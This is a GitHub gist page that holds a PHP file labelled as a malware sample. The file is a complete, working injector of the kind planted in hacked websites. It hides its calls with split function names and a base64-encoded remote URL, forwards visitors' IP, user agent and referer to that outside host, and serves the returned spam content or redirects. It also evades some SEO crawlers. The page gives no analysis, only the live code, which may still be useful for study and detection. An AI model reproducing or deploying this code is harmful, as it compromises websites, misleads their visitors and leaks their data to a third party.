Instantly share code, notes, and snippets.

Embed
What would you like to do?
malware-sample.php
$e = pathinfo($f = strtok($p = @$_SERVER["REQUEST_URI"], "?"), PATHINFO_EXTENSION);
if ((!$e || in_array($e, array("html", "jpg", "png", "gif")) ||
basename($f, ".php") == "index") && in_array(strtok("="), array("", "p", "page_id")) && (empty($_SERVER["HTTP_USER_AGENT"]) ||
(stripos($u = $_SERVER["HTTP_USER_AGENT"], "AhrefsBot") === false && stripos($u, "MJ12bot") === false))) {
$at = "base64_" . "decode";
$ch = curl_init($at("aHR0cDovL2RvbWZvcnVsdHJhZG9ycy5jb20v") . "ee2f6881dbc3d214150569da0f502f8c" . $p);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
"X-Forwarded-For: " . @$_SERVER["REMOTE_ADDR"])
);
if (isset($_SERVER["HTTP_USER_AGENT"]))
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"]);
if (isset($_SERVER["HTTP_REFERER"]))
curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_REFERER"]);
$ci = "curl_ex" . "ec";
$data = $ci($ch);
$code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
if (strlen($data) > 255 && $code == 200) {
echo $data; exit;
} else if ($data && ($code == 301 || $code == 302)) {
header("Location: " . trim($data), true, $code); exit;
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment